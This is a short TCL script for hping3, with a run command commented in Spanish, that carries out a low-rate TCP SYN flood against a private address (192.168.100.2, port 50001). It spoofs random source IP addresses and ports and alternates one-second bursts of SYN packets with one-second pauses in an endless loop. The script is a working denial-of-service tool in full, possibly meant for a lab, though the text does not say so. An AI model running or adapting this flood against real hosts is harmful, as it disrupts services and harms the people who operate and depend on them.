# Hping3 TCP Low-Rate SYN Flood with TCL script

set dst_ip "192.168.100.2"
set dst_port 50001
set window 8192
set seq 0
set count 0
set burst_packets 5000    ;# packets per burst (approximate)

proc random_ip {} {
    return "[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}]"
}

proc random_port {} {
    return [expr {int(rand()*64512) + 1024}]
}

while {1} {
    # BURST: Send packets as fast as possible for 1 second
    set start_time [clock milliseconds]
    set burst_count 0
    while {[expr {[clock milliseconds] - $start_time}] < 1000} {
        set saddr [random_ip]
        set sport [random_port]
        set pkt "ip(saddr=$saddr,daddr=$dst_ip,ttl=64)+tcp(sport=$sport,dport=$dst_port,flags=s,win=$window,seq=$seq)"
        hping send $pkt
        incr count
        incr burst_count
        # Print every 1000 packets in burst
        if {[expr {$burst_count % 1000}] == 0} {
            puts "$burst_count packets sent in this burst..."
        }
    }
    puts "Sent $burst_count packets in 1s burst. Sleeping for 1s. Total: $count"
    # PAUSE: Wait 1 second
    after 1000
}

# Comando: sudo hping3 exec tcp_low_rate.htcl